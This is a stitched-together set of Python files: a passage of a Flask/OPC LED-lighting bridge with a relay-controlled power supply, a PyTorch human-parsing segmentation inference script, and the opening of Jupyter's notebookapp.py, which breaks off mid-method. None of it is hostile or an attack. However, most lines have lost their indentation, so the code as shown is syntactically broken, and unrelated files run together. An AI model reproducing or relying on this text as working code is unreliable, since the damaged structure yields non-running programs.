newBri = currentBri + magnitude
newBri = min(255, max(0, int(newBri)))
if not newBri:
newBri = 1
if currentBri == newBri:
return rgb
rgbOut = rgbSetBrightness(newBri, rgb)
return rgbOut
else:
return rgb
################################################################################
class PSU:
def __init__(self, ip, index, port=8001):
self.ip = ip
self.port = port
self.index = index
self.state = False
def switch(self, state):
'''Switch relay attached to lighting PSU'''
try:
params = {'index': self.index, 'state': state}
requests.get('http://' + self.ip + ':' + str(self.port) + '/switch', json=params, timeout=3)
self.state = state
except Exception as e:
print('Failed to connect to relay processor')
print(e)
def checkPixels(self, pixels):
        '''Crawl down the pixel array; return True if any channel value is above 0.
        Used in conjunction with self.switch to kill power to the PSU if the lights are off'''
for pix in pixels:
for color in pix:
if color > 0:
return True
return False
def update(self, pixels):
'''If pixel array has no lights on, kill its associated PSU'''
if self.checkPixels(pixels):
if not self.state:
print('Spinning up PSU')
self.switch(True)
else:
if self.state:
print('Killing PSU')
self.switch(False)
class Renderer:
def __init__(self, frameRate, PSU=False):
#Current value of pixels being submitted to opc
self.pixels = np.zeros((512, 3), dtype='float32')
#Differential array: stores difference between this frame and the next
        self.diff = np.zeros((512, 3), dtype='float32')
#End values: where the final frame should end up
self.endVals = np.zeros((512, 3), dtype='float32')
#Remaining number of frames for each pixel
self.remaining = np.zeros((512), dtype='uint16')
#Used to sleep thread when there is no rendering to be done
self.clockerActive = threading.Event()
#Queue of commands to be executed
#API handler thread produces commands, Render Loop consumes them
self.commands = queue.Queue(maxsize=100)
#TODO: Make framerate and opcClient ip configurable
self.frameRate = frameRate
self.opcClient = opc.Client('localhost:7890')
self.renderLoop = threading.Thread(target=self.render)
self.renderLoop.daemon = True
self.PSU = PSU
def absoluteFade(self, rgb, indexes, fadeTime):
        '''Fade the pixels listed in indexes to the color in rgb over
        fadeTime seconds'''
        #If the fadeTime is 0, we still want at least 2 frames
        #With only one frame, the interpolation engine would produce a slow fade
if not fadeTime:
fadeTime = 2 / self.frameRate
frames = int(fadeTime * self.frameRate)
for i in indexes:
self.remaining[i] = frames
for c in range(3):
self.diff[i][c] = (rgb[c] - self.pixels[i][c]) / frames
self.endVals[i] = rgb
def multiCommand(self, commandList):
'''Multicommand format: [indexes, rgb value, fadetime]
allows for multiple different pixels to be set to multiple different values;
this is more efficient than stringing individual commands together'''
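# Example of the expected payload (illustration only): fade pixels 0-2 to red
# over 1.5 s and pixel 3 to blue as fast as possible:
#   [[[0, 1, 2], [255, 0, 0], 1.5], [[3], [0, 0, 255], 0]]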
for x in commandList:
#Which pixels are being controlled?
indexes = x[0]
#How much time does it take to complete?
frames = int(x[2] * self.frameRate)
if not frames:
frames = 2
#What color are we fading to?
rgb = x[1]
for i in indexes:
self.remaining[i] = frames
for c in range(3):
self.diff[i][c] = (rgb[c] - self.pixels[i][c]) / frames
self.endVals[i] = rgb
def relativeFade(self, magnitude, indexes, fadeTime):
'''fade value up or down relative to current pixel values'''
commandList = []
for i in indexes:
endVal = brightnessChange(self.pixels[i], magnitude)
commandList.append([[i], endVal, fadeTime])
self.multiCommand(commandList)
def executeCommands(self):
'''Take all commands out of command queue and execute them'''
if self.PSU and not self.commands.empty():
self.PSU.update(self.pixels)
while not self.commands.empty():
newCommand, args = self.commands.get()
try:
newCommand(*args)
except Exception as e:
print('Command failed!')
logError(str(e))
def render(self):
'''Primary rendering loop, takes commands from API handler at start and
submits frames at end'''
print('Initiating Render Loop...')
while True:
now = time.perf_counter()
self.executeCommands()
anyRemaining = False
for pix in range(512):
if not self.remaining[pix]:
pass
elif self.remaining[pix] > 1:
for i in range(3):
self.pixels[pix][i] += self.diff[pix][i]
self.remaining[pix] -= 1
anyRemaining = True
elif self.remaining[pix] == 1:
self.pixels[pix] = self.endVals[pix]
self.remaining[pix] -= 1
anyRemaining = True
try:
self.opcClient.put_pixels(self.pixels)
except Exception as e:
print('Unable to contact opc Client')
cycleTime = time.perf_counter() - now
time.sleep(max((1 / self.frameRate) - cycleTime, 0))
if not anyRemaining:
if self.PSU:
self.PSU.update(self.pixels)
if self.commands.empty():
self.clockerActive.clear()
print('Sleeping render loop...')
self.clockerActive.wait()
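# Minimal usage sketch (illustration only, never called): the Flask resources
# below drive the Renderer exclusively through its command queue plus the
# clockerActive event, so any other producer would follow the same pattern.
def _renderer_usage_sketch():
    r = Renderer(frameRate=30)
    r.renderLoop.start()
    # Queue a 2-second fade of the first three pixels to red, then wake the loop.
    r.commands.put((r.absoluteFade, [[255, 0, 0], [0, 1, 2], 2.0]))
    r.clockerActive.set()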
if __name__ == '__main__':
#########################LOAD IN USER CONFIG####################################
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'opcConfig.yml')) as f:
configFile = f.read()
configs = yaml.safe_load(configFile)
##################SERVER LOGGING AND REPORTING FUNCTIONS########################
def logError(err):
print(err)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'opcBridge-log.txt'), 'a') as logFile:
logFile.write(err)
logFile.write('\n')
bootMsg = 'Server booted at ' + str(datetime.datetime.now()) + '\n'
logError(bootMsg)
psu = PSU(configs['PSUs']['ip'], configs['PSUs']['index'], port=configs['PSUs']['port'])
renderer = Renderer(configs['framerate'], PSU=psu)
flaskServer = Flask(__name__)
api = Api(flaskServer)
localIP = getLocalIP()
port = 8000
arbitration = [False, '127.0.0.1']
parser = reqparse.RequestParser()
#########################VARIOUS COMMAND FIELDS#########################
parser.add_argument('fadetime', type=float, help='How long will this fade take?')
parser.add_argument('indexes', type=json.loads, help='Which pixels are targeted')
parser.add_argument('id', type=str, help='Arbitration ID')
parser.add_argument('ip', type=str, help='IP address of client')
parser.add_argument('rgb', type=json.loads, help='Target color')
parser.add_argument('magnitude', type=float, help='Size of fade')
parser.add_argument('commandlist', type=json.loads, help='List of commands for a multicommand')
###################COMMAND TYPE HANDLING########################################
class Pixels(Resource):
def get(self):
'''Gives the entire pixel array back to the client as a 512 * 3 array'''
print('\nSending pixels to %s \n' % request.remote_addr)
message = pixelsToJson(renderer.pixels)
return message
class Arbitration(Resource):
def put(self):
args = parser.parse_args()
id = args['id']
ip = request.remote_addr
print('\nGiving arbitration to %s from %s\n' % (id, ip))
arbitration[0] = id
arbitration[1] = ip
def get(self):
args = parser.parse_args()
id = args['id']
ip = request.remote_addr
print('\nSending arbitration to %s for %s\n' % (ip, id))
if id != arbitration[0]:
return False
elif ip != arbitration[1]:
return False
else:
return True
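# Illustration (intent inferred from the handlers above): a client PUTs its id
# to /arbitration to claim control; afterwards a GET /arbitration only returns
# true when the supplied id matches the claimed id and the request comes from
# the claiming ip.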
class AbsoluteFade(Resource):
'''Is given a color to fade to, and executes fade'''
def get(self):
args = parser.parse_args()
fadeTime = args['fadetime']
rgb = args['rgb']
indexes = args['indexes']
renderer.commands.put((renderer.absoluteFade, [rgb, indexes, fadeTime]))
renderer.clockerActive.set()
class MultiCommand(Resource):
'''Is given a list of indexes, associated values and fade times, and
executes them all in one action. This is much more efficient than
several absoluteFade commands strung together'''
def get(self):
args = parser.parse_args()
commandList = args['commandlist']
renderer.commands.put((renderer.multiCommand, [commandList]))
renderer.clockerActive.set()
class RelativeFade(Resource):
'''Is given a brightness change and alters the brightness; likely unpredictable
behavior if called in the middle of another fade'''
def get(self):
args = parser.parse_args()
indexes = args['indexes']
magnitude = args['magnitude']
fadeTime = args['fadetime']
renderer.commands.put((renderer.relativeFade, [magnitude, indexes, fadeTime]))
renderer.clockerActive.set()
api.add_resource(Pixels, '/pixels')
api.add_resource(Arbitration, '/arbitration')
api.add_resource(AbsoluteFade, '/absolutefade')
api.add_resource(MultiCommand, '/multicommand')
api.add_resource(RelativeFade, '/relativefade')
psu.switch(True)
#Test pattern to indicate server is up and running
testPatternOff = np.zeros((512, 3))
testPatternRed = np.full((512, 3), [64,0,0])
renderer.opcClient.put_pixels(testPatternRed)
renderer.opcClient.put_pixels(testPatternRed)
time.sleep(.5)
renderer.opcClient.put_pixels(testPatternOff)
renderer.opcClient.put_pixels(testPatternOff)
time.sleep(.5)
renderer.opcClient.put_pixels(testPatternRed)
renderer.opcClient.put_pixels(testPatternRed)
time.sleep(.5)
renderer.opcClient.put_pixels(testPatternOff)
renderer.opcClient.put_pixels(testPatternOff)
del testPatternOff
del testPatternRed
renderer.renderLoop.start()
flaskServer.run(host=localIP, port=port, debug=False)
|
inference_folder.py
|
# Standard libraries
import timeit
from pathlib import Path
from glob import glob
from datetime import datetime
import os
import sys
from collections import OrderedDict
import argparse
from typing import List
sys.path.append('./')
# PyTorch
import torch
torch.set_num_threads(1)
from torch.autograd import Variable
import torch.nn.functional as F
import torch.utils.data
from torchvision import transforms
torch.set_grad_enabled(False)
# Other third-party libraries
import numpy as np
from PIL import Image
import cv2
cv2.setNumThreads(0)
from tqdm import tqdm
# Custom imports
from networks import deeplab_xception_transfer, graph
from dataloaders import custom_transforms as tr
label_colours = [(0,0,0)
, (128,0,0), (255,0,0), (0,85,0), (170,0,51), (255,85,0), (0,0,85), (0,119,221), (85,85,0), (0,85,85), (85,51,0), (52,86,128), (0,128,0)
, (0,0,255), (51,170,221), (0,255,255), (85,255,170), (170,255,85), (255,255,0), (255,170,0)]
def flip_cihp(tail_list):
"""
Swap channels in a probability map so that "left foot" becomes "right foot" etc.
tail_list: (B x n_class x h x w)
"""
return torch.cat((
tail_list[:, :14],
tail_list[:, 14:15],
tail_list[:, 15:16],
tail_list[:, 17:18],
tail_list[:, 16:17],
tail_list[:, 19:20],
tail_list[:, 18:19]), dim=1)
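# Shape-check sketch (illustration only, never called): flip_cihp only permutes
# the class channels (16<->17 and 18<->19, everything else kept in order); the
# spatial flip of the image itself is undone separately with torch.flip below.
def _flip_cihp_shape_check():
    dummy = torch.zeros(1, 20, 4, 4)      # B x n_class x h x w
    assert flip_cihp(dummy).shape == dummy.shape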
def decode_labels(mask, num_images=1, num_classes=20):
"""Decode batch of segmentation masks.
Args:
mask: result of inference after taking argmax.
num_images: number of images to decode from the batch.
num_classes: number of classes to predict (including background).
Returns:
A batch with num_images RGB images of the same size as the input.
"""
n, h, w = mask.shape
assert (n >= num_images), 'Batch size %d should be greater or equal than number of images to save %d.' % (
n, num_images)
outputs = np.zeros((num_images, h, w, 3), dtype=np.uint8)
for i in range(num_images):
img = Image.new('RGB', (len(mask[i, 0]), len(mask[i])))
pixels = img.load()
for j_, j in enumerate(mask[i, :, :]):
for k_, k in enumerate(j):
if k < num_classes:
pixels[k_, j_] = label_colours[k]
outputs[i] = np.array(img)
return outputs
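# Sketch (illustration only, never called): decode_labels maps each class index
# to its RGB colour from label_colours, so an all-zero (background) mask decodes
# to an all-black image of shape (1, h, w, 3).
def _decode_labels_example():
    mask = np.zeros((1, 4, 4), dtype=np.int64)
    return decode_labels(mask, num_images=1)   # uint8 array, all zeros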
def read_img(img_path):
_img = Image.open(img_path).convert('RGB')  # returns an RGB image
return _img
def img_transform(img, transform):
sample = {'image': img, 'label': 0}
sample = transform(sample)
return sample['image']
def save_image(image, path):
path.parent.mkdir(parents=True, exist_ok=True)
cv2.imwrite(str(path), image)
if __name__ == '__main__':
'''argparse begin'''
parser = argparse.ArgumentParser()
parser.add_argument('--model_path', required=True, type=Path,
help="Where the model weights are.")
parser.add_argument('--images_path', required=True, type=Path,
help="Where to look for images. Can be a file with a list of paths, or a " \
"directory (will be searched recursively for png/jpg/jpeg files).")
parser.add_argument('--output_dir', required=True, type=Path,
help="A directory where to save the results. Will be created if doesn't exist.")
parser.add_argument('--common_prefix', type=Path,
help="Common prefix relative to which save the output files.")
parser.add_argument('--tta', default='1,0.75,0.5,1.25,1.5,1.75', type=str,
help="A list of scales for test-time augmentation.")
parser.add_argument('--save_extra_data', action='store_true',
help="Save parts' segmentation masks, colored segmentation masks and images with removed background.")
opts = parser.parse_args()
net = deeplab_xception_transfer.deeplab_xception_transfer_projection_savemem(n_classes=20,
hidden_layers=128,
source_classes=7, )
# Initialize saver processes
import multiprocessing
class ConstrainedTaskPool:
def __init__(self, num_processes=1, max_tasks=100):
self.num_processes = num_processes
self.task_queue = multiprocessing.Queue(maxsize=max_tasks)
def __enter__(self):
def worker_function(task_queue):
for function, args in iter(task_queue.get, 'STOP'):
function(*args)
for _ in range(self.num_processes):
multiprocessing.Process(target=worker_function, args=(self.task_queue,)).start()
return self
def __exit__(self, *args):
for _ in range(self.num_processes):
self.task_queue.put('STOP')
def put_async(self, function, *args):
self.task_queue.put((function, args))
with ConstrainedTaskPool(num_processes=4, max_tasks=6000) as background_saver:
def save_image_async(image, path):
background_saver.put_async(save_image, image, path)
net.load_source_model(torch.load(opts.model_path))
net.cuda()
# adj
adj2_ = torch.from_numpy(graph.cihp2pascal_nlp_adj).float()
adj2_test = adj2_.unsqueeze(0).unsqueeze(0).expand(1, 1, 7, 20).cuda().transpose(2, 3)
adj1_ = Variable(torch.from_numpy(graph.preprocess_adj(graph.pascal_graph)).float())
adj3_test = adj1_.unsqueeze(0).unsqueeze(0).expand(1, 1, 7, 7).cuda()
cihp_adj = graph.preprocess_adj(graph.cihp_graph)
adj3_ = Variable(torch.from_numpy(cihp_adj).float())
adj1_test = adj3_.unsqueeze(0).unsqueeze(0).expand(1, 1, 20, 20).cuda()
net.eval()
image_paths_list: List[Path]
if opts.images_path.is_file():
print(f"`--images_path` ({opts.images_path}) is a file, reading it for a list of files...")
with open(opts.images_path, 'r') as f:
image_paths_list = sorted(Path(line.strip()) for line in f)
if opts.common_prefix is None:
common_prefix = Path(os.path.commonpath(image_paths_list))
else:
common_prefix = opts.common_prefix
for path in image_paths_list:
# TODO optimize by using commonpath
assert common_prefix in path.parents
elif opts.images_path.is_dir():
print(f"`--images_path` ({opts.images_path}) is a directory, recursively looking for images in it...")
def list_files_recursively(path, allowed_extensions):
retval = []
for child in path.iterdir():
if child.is_dir():
retval += list_files_recursively(child, allowed_extensions)
elif child.suffix.lower() in allowed_extensions:
retval.append(child)
return retval
image_paths_list = sorted(list_files_recursively(opts.images_path, ('.png', '.jpg', '.jpeg')))
common_prefix = opts.images_path
else:
raise FileNotFoundError(f"`--images_path` ('{opts.images_path}')")
print(f"Found {len(image_paths_list)} images")
print(f"Will output files in {opts.output_dir} with names relative to {common_prefix}.")
print(f"Example:")
print(f"The segmentation for: {image_paths_list[0]}")
print(f"Will be put in: {opts.output_dir / image_paths_list[0].relative_to(common_prefix).parent}")
tta = opts.tta
try:
tta = tta.split(',')
tta = list(map(float, tta))
except ValueError:
raise ValueError(f'tta must be a sequence of comma-separated float values such as "1.0,0.5,1.5". Got "{opts.tta}".')
scale_list = tta
# 1.0 should always go first
try:
scale_list.remove(1.0)
except ValueError:
pass
scale_list.insert(0, 1.0)
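# The 1.0 scale goes first: its input size fixes the (h, w) that predictions
# from every other scale are upsampled to before the TTA outputs are summed.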
class InferenceDataset(torch.utils.data.Dataset):
def __init__(self, img_paths, scale_list):
self.img_paths = img_paths
self.scale_list = scale_list
def __len__(self):
return len(self.img_paths)
def __getitem__(self, idx):
image_path = self.img_paths[idx]
img = read_img(image_path)
original_size = torch.tensor(img.size) # to make `default_collate` happy
img = img.resize((256, 256))
img_flipped = img_transform(img, tr.HorizontalFlip_only_img())
retval, retval_flipped = [], []
for scale in self.scale_list:
transform = transforms.Compose([
tr.Scale_only_img(scale),
tr.Normalize_xception_tf_only_img(),
tr.ToTensor_only_img()])
retval.append(img_transform(img, transform))
retval_flipped.append(img_transform(img_flipped, transform))
# `str()` because `default_collate` doesn't like `Path`
return retval, retval_flipped, str(image_path), original_size
dataset = InferenceDataset(image_paths_list, scale_list)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=8, num_workers=2)
exec_times = []
for sample_idx, (images, images_flipped, image_paths, original_sizes) in enumerate(dataloader):
# `images`, `images_flipped`: list of length <number-of-scales>,
# each element is a tensor of shape (<batch-size> x 3 x H_k x W_k);
# `image_paths`: tuple of length <batch-size> of str
# `original_size`: int tensor of shape (<batch-size> x 2)
if sample_idx % 10 == 0:
print(f"{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}: {sample_idx} / {len(dataloader)}")
original_sizes = [tuple(original_size.tolist()) for original_size in original_sizes]
image_paths = [Path(x).relative_to(common_prefix) for x in image_paths]
batch_size = len(images[0])
print("images", images[0].size())
print("batch_size", batch_size)
start_time = timeit.default_timer()
for iii, (image, image_flipped) in enumerate(zip(images, images_flipped)):
inputs = torch.cat((image, image_flipped))
print("Input Sizes", inputs.size(), image.size(), image_flipped.size(), inputs[0, :,0,0])
if iii == 0:
_, _, h, w = inputs.shape
inputs = inputs.cuda()
outputs = net.forward(inputs, adj1_test.cuda(), adj3_test.cuda(), adj2_test.cuda())
print("Output Sizes",outputs.size())
outputs = (outputs[:batch_size] + torch.flip(flip_cihp(outputs[batch_size:]), dims=[-1,])) / 2
print("Post Output Sizes",outputs.size())
if iii > 0:
outputs = F.interpolate(outputs, size=(h, w), mode='bilinear', align_corners=True)
outputs_final = outputs_final + outputs
print("WTF")
else:
outputs_final = outputs
# outputs_final: `B x 20 x H x W`
end_time = timeit.default_timer()
exec_times.append(end_time - start_time)
# Actually write the outputs to disk
if opts.save_extra_data:
predictions = torch.max(outputs_final, 1)[1]
results = predictions.cpu().numpy()
vis_results = decode_labels(results)
for input_image_1xScale, vis_result, result, image_path \
in zip(images[0], vis_results, results, image_paths):
# saving grayscale mask image
save_image_async(result, opts.output_dir / 'mask_gray' / image_path.with_suffix('.png'))
# saving colored mask image
save_image_async(vis_result, opts.output_dir / 'mask_color' / image_path.with_suffix('.png'))
# saving segmented image with masked pixels drawn black
segmented_img = np.asarray(input_image_1xScale * 0.5 + 0.5) * (result > 0).astype(float)[np.newaxis]
save_image_async(
segmented_img.transpose(1,2,0) * 255,
opts.output_dir / 'segmented' / image_path.with_suffix('.png'))
else:
background_probability = 1.0 - outputs_final.softmax(1)[:, 0] # `B x H x W`
background_probability = (background_probability * 255).round().byte().cpu().numpy()
for background_probability_single_sample, image_path, original_size \
in zip(background_probability, image_paths, original_sizes):
output_image_path = opts.output_dir / image_path.with_suffix('.png')
save_image_async(
cv2.resize(background_probability_single_sample, original_size), output_image_path)
print('Average inference time:', np.mean(exec_times))
|
notebookapp.py
|
# coding: utf-8
"""A tornado based Jupyter notebook server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import absolute_import, print_function
import notebook
import binascii
import datetime
import errno
import importlib
import io
import json
import logging
import mimetypes
import os
import random
import re
import select
import signal
import socket
import sys
import threading
import warnings
import webbrowser
try: #PY3
from base64 import encodebytes
except ImportError: #PY2
from base64 import encodestring as encodebytes
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
msg = "The Jupyter Notebook requires tornado >= 4.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (4,0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
from notebook import (
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
# py23 compatibility
try:
raw_input = raw_input
except NameError:
raw_input = input
from .base.handlers import Template404, RedirectWithParams
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager
from .services.config import ConfigManager
from .services.contents.manager import ContentsManager
from .services.contents.filemanager import FileContentsManager
from .services.contents.largefilemanager import LargeFileManager
from .services.sessions.sessionmanager import SessionManager
from .auth.login import LoginHandler
from .auth.logout import LogoutHandler
from .base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp, base_flags, base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager, NoSuchKernel, NATIVE_KERNEL_NAME
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Dict, Unicode, Integer, List, Bool, Bytes, Instance,
TraitError, Type, Float, observe, default, validate
)
from ipython_genutils import py3compat
from jupyter_core.paths import jupyter_runtime_dir, jupyter_path
from notebook._sysinfo import get_sys_info
from ._tz import utcnow
from .utils import url_path_join, check_pid, url_escape
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
jupyter notebook # start the notebook
jupyter notebook --certfile=mycert.pem # use SSL/TLS certificate
jupyter notebook password # enter a password to protect the server
"""
DEV_NOTE_NPM = """It looks like you're running the notebook from source.
If you're working on the Javascript of the notebook, try running
npm run build:watch
in another terminal window to have the system incrementally
watch and build the notebook's JavaScript for you, as you make changes.
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
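# Example (illustration only): list(random_ports(8888, 8)) yields 8888..8892
# followed by 3 ports drawn at random from [8888 - 16, 8888 + 16].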
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
name = 'notebook.' + name
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, log,
base_url, default_url, settings_overrides, jinja_env_options):
# If the user is running the notebook in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, '..', '..'))
dev_mode = os.path.exists(os.path.join(base_dir, '.git'))
if dev_mode:
log.info(DEV_NOTE_NPM)
settings = self.init_settings(
jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager, config_manager, log, base_url,
default_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
super(NotebookWebApplication, self).__init__(handlers, **settings)
def init_settings(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager,
log, base_url, default_url, settings_overrides,
jinja_env_options=None):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, py3compat.string_types):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(loader=FileSystemLoader(template_path), **jenv_opt)
sys_info = get_sys_info()
if sys_info['commit_source'] == 'repository':
# don't cache (rely on 304) when working from master
version_hash = ''
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
if jupyter_app.ignore_minified_js:
log.warning("""The `ignore_minified_js` flag is deprecated and no
longer works. Alternatively use `npm run build:watch` when
working on the notebook's Javascript and LESS""")
warnings.warn("The `ignore_minified_js` flag is deprecated and will be removed in Notebook 6.0", DeprecationWarning)
now = utcnow()
root_dir = contents_manager.root_dir
home = os.path.expanduser('~')
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
settings = dict(
# basics
log_function=log_request,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_url,'/static/'),
static_handler_args = {
# don't cache custom.js
'no_cache_paths': [url_path_join(base_url, 'static', 'custom')],
},
version_hash=version_hash,
ignore_minified_js=jupyter_app.ignore_minified_js,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
rate_limit_window=jupyter_app.rate_limit_window,
# maximum request sizes - support saving larger notebooks
# tornado defaults are 100 MiB, we increase it to 0.5 GiB
max_body_size = 512 * 1024 * 1024,
max_buffer_size = 512 * 1024 * 1024,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url,'/login'),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# Jupyter stuff
started=now,
jinja_template_vars=jupyter_app.jinja_template_vars,
nbextensions_path=jupyter_app.nbextensions_path,
websocket_url=jupyter_app.websocket_url,
mathjax_url=jupyter_app.mathjax_url,
mathjax_config=jupyter_app.mathjax_config,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=False, # Set later if terminals are available
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
handlers.extend(load_handlers('tree.handlers'))
handlers.extend([(r"/login", settings['login_handler_class'])])
handlers.extend([(r"/logout", settings['logout_handler_class'])])
handlers.extend(load_handlers('files.handlers'))
handlers.extend(load_handlers('view.handlers'))
handlers.extend(load_handlers('notebook.handlers'))
handlers.extend(load_handlers('nbconvert.handlers'))
handlers.extend(load_handlers('bundler.handlers'))
handlers.extend(load_handlers('kernelspecs.handlers'))
handlers.extend(load_handlers('edit.handlers'))
handlers.extend(load_handlers('services.api.handlers'))
handlers.extend(load_handlers('services.config.handlers'))
handlers.extend(load_handlers('services.kernels.handlers'))
handlers.extend(load_handlers('services.contents.handlers'))
handlers.extend(load_handlers('services.sessions.handlers'))
handlers.extend(load_handlers('services.nbconvert.handlers'))
handlers.extend(load_handlers('services.kernelspecs.handlers'))
handlers.extend(load_handlers('services.security.handlers'))
handlers.append(
(r"/nbextensions/(.*)", FileFindHandler, {
'path': settings['nbextensions_path'],
'no_cache_paths': ['/'], # don't cache anything in nbextensions
}),
)
handlers.append(
(r"/custom/(.*)", FileFindHandler, {
'path': settings['static_custom_path'],
'no_cache_paths': ['/'], # don't cache anything in custom
})
)
# register base handlers last
handlers.extend(load_handlers('base.handlers'))
# set the URL that will be redirected from `/`
handlers.append(
(r'/?', RedirectWithParams, {
'url' : settings['default_url'],
'permanent': False, # want 302, not 301
})
)
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
class NotebookPasswordApp(JupyterApp):
"""Set a password for the notebook server.
Setting a password secures the notebook server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, 'jupyter_notebook_config.json')
def start(self):
from .auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
class NbserverListApp(JupyterApp):
version = __version__
description="List currently running notebook servers."
flags = dict(
json=({'NbserverListApp': {'json': True}},
"Produce machine-readable JSON output."),
)
json = Bool(False, config=True,
help="If True, each line of output will be a JSON object with the "
"details from the server info file.")
def start(self):
if not self.json:
print("Currently running servers:")
for serverinfo in list_running_servers(self.runtime_dir):
if self.json:
print(json.dumps(serverinfo))
else:
url = serverinfo['url']
if serverinfo.get('token'):
url = url + '?token=%s' % serverinfo['token']
print(url, "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
"Don't open the notebook in a browser after startup."
)
flags['pylab']=(
{'NotebookApp' : {'pylab' : 'warn'}},
"DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib."
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['allow-root']=(
{'NotebookApp' : {'allow_root' : True}},
"Allow the notebook to be run from root user."
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileContentsManager.save_script',
'DEPRECATED, IGNORED',
'DEPRECATED, IGNORED'))
aliases = dict(base_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'client-ca': 'NotebookApp.client_ca',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
'pylab': 'NotebookApp.pylab',
})
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(JupyterApp):
name = 'jupyter-notebook'
version = __version__
description = """
The Jupyter HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an
HTML5/Javascript Notebook client.
"""
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, Session, MappingKernelManager,
ContentsManager, FileContentsManager, NotebookNotary,
KernelSpecManager,
]
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
password=(NotebookPasswordApp, NotebookPasswordApp.description.splitlines()[0]),
)
_log_formatter_cls = LogFormatter
@default('log_level')
def _default_log_level(self):
return logging.INFO
@default('log_datefmt')
def _default_log_datefmt(self):
"""Exclude date from default date format"""
